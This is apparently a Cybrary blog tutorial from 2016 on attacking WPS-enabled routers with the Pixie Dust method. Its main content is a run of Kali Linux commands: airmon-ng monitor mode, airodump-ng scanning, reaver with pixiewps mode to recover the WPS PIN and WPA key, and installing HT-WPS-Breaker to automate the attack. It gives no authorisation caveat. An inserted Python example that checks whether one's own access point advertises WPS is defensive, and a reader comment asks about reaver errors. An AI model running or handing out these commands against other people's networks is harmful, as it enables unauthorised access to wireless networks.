Hacking WPS via Pixie Dust Attack

April 22, 2016 | Views: 62673


This Cybrary 0P3N submission covers how to use the Aircrack-ng suite, Reaver, Pixiewps, and HT-WPS#B to exploit a WPS vulnerability in certain routers.

The attack is carried out on a machine running Kali Linux. (Kali comes pre-packaged with the tools mentioned, aside from HT-WPS#B.)

Here is a list of vulnerable routers:
Spreadsheet of Routers Vulnerable to WPS Exploit

To start, open a terminal as root and run the following commands.

 

apt-get update

apt-get install reaver aircrack-ng

 

Once you have run the commands above, use airmon-ng to put the wireless card into monitor mode. (You must have a wireless card capable of packet injection.)

First we will check for any interfering processes by using the following command.

 

airmon-ng check

 

If processes were found, use the following command to kill them.

 

airmon-ng check kill

 

Now to set the card to monitor mode.

 

airmon-ng start wlan0

 

Next we will use airodump-ng to scan for wireless access points with WPS enabled.

 

airodump-ng wlan0mon --wps

 

Once airodump-ng has found the AP you are attacking, press Ctrl+C to stop, then copy down the BSSID and channel number.

Our next step is to use Reaver combined with Pixiewps mode to exploit the target AP.

 

reaver -i wlan0mon -c # -b XX:XX:XX:XX:XX:XX -k 1

 

-i specifies the interface used

-c specifies the channel of the AP. Replace # with the channel number.

-b specifies the BSSID of the AP. Replace XX:XX:XX:XX:XX:XX with the BSSID you copied down.

You can also time the reaver process by using the following command.

 

time reaver -i wlan0mon -c # -b XX:XX:XX:XX:XX:XX -k 1

 

If successful, the WPS PIN will be passed to Reaver and the WPA key will be discovered.
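WPS-enabled APs announce themselves through a WPS information element in their beacon frames, which is what the WPS scan step above relies on. The following added example (not part of the original post) parses that element so you can check whether an access point you administer still advertises WPS and whether it reports itself as setup-locked. The attribute IDs are those of the WPS specification; the function names and the sample bytes are this example's own constructions.

```python
import struct

WPS_OUI_TYPE = bytes.fromhex("0050f204")  # OUI 00:50:F2, type 4 = WPS
ATTR_STATE, ATTR_AP_LOCKED = 0x1044, 0x1057
STATES = {b"\x01": "not configured", b"\x02": "configured"}

def iter_elements(tagged):
    """Yield (element_id, body) for each 802.11 information element."""
    pos = 0
    while pos + 2 <= len(tagged):
        eid, length = tagged[pos], tagged[pos + 1]
        body = tagged[pos + 2:pos + 2 + length]
        if len(body) < length:
            raise ValueError("truncated information element")
        yield eid, body
        pos += 2 + length

def parse_wps_attrs(body):
    """Parse WPS TLVs: 2-byte type, 2-byte length (big-endian), value."""
    attrs, pos = {}, 0
    while pos + 4 <= len(body):
        atype, alen = struct.unpack_from(">HH", body, pos)
        value = body[pos + 4:pos + 4 + alen]
        if len(value) < alen:
            raise ValueError("truncated WPS attribute")
        attrs[atype] = value
        pos += 4 + alen
    return attrs

def audit_wps(tagged):
    """Report the WPS status advertised in a beacon's tagged parameters."""
    for eid, body in iter_elements(tagged):
        if eid == 0xDD and body[:4] == WPS_OUI_TYPE:  # vendor-specific WPS IE
            attrs = parse_wps_attrs(body[4:])
            return {
                "wps_enabled": True,
                "state": STATES.get(attrs.get(ATTR_STATE, b"")[:1], "unknown"),
                "ap_setup_locked": attrs.get(ATTR_AP_LOCKED, b"")[:1] == b"\x01",
            }
    return {"wps_enabled": False}

# Constructed sample: SSID element "lab-ap", then a WPS element carrying
# Version 0x10, WPS State = configured, AP Setup Locked = true.
SAMPLE_WPS = bytes.fromhex(
    "00066c61622d6170" "dd130050f204" "104a000110" "1044000102" "1057000101")
SAMPLE_NO_WPS = bytes.fromhex("00066c61622d6170")

if __name__ == "__main__":
    print(audit_wps(SAMPLE_WPS), audit_wps(SAMPLE_NO_WPS))
```

A beacon with no WPS element returns `wps_enabled: False`, which is the result to expect from your own AP after WPS has been turned off in its settings.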

 

Once you have followed the above steps and are comfortable with the process, I suggest using HT-WPS#B to automate the entire process.

 

Using HT-WPS-Breaker to automate the process.


To install, download HT-WPS-Breaker-master.zip, drag the .zip to your desktop, and run the following commands.

  • cd Desktop
  • unzip HT-WPS-Breaker-master.zip
  • cd HT-WPS-Breaker-master
  • chmod +x HT-WB.sh
  • ./HT-WB.sh or bash HT-WB.sh

 

This concludes a simple write-up of how to use Reaver and other tools to attack a WPS-enabled AP.

I have had many questions on how to use Reaver so I hope this helps.

Comment below if you have any questions. (Please keep comments on topic.)

~Evox

47 Comments
  1. Hi everybody! And thank you for all

    First of all, excuse my English.
    I have Alfa Network and TP-Link adapters with the Atheros AR9271 chip, and I repeatedly get this error when I test Wi-Fi with WPS enabled and not locked.

    Failed to authenticate (0x02)
    or
    Timeout

    I have tried with 7 different routers.
    I use Kali Linux 2.0, updated.
    I checked with “wash -i wlan0mon” but still the error persists.
    Any solution to this?

    Thank you team!
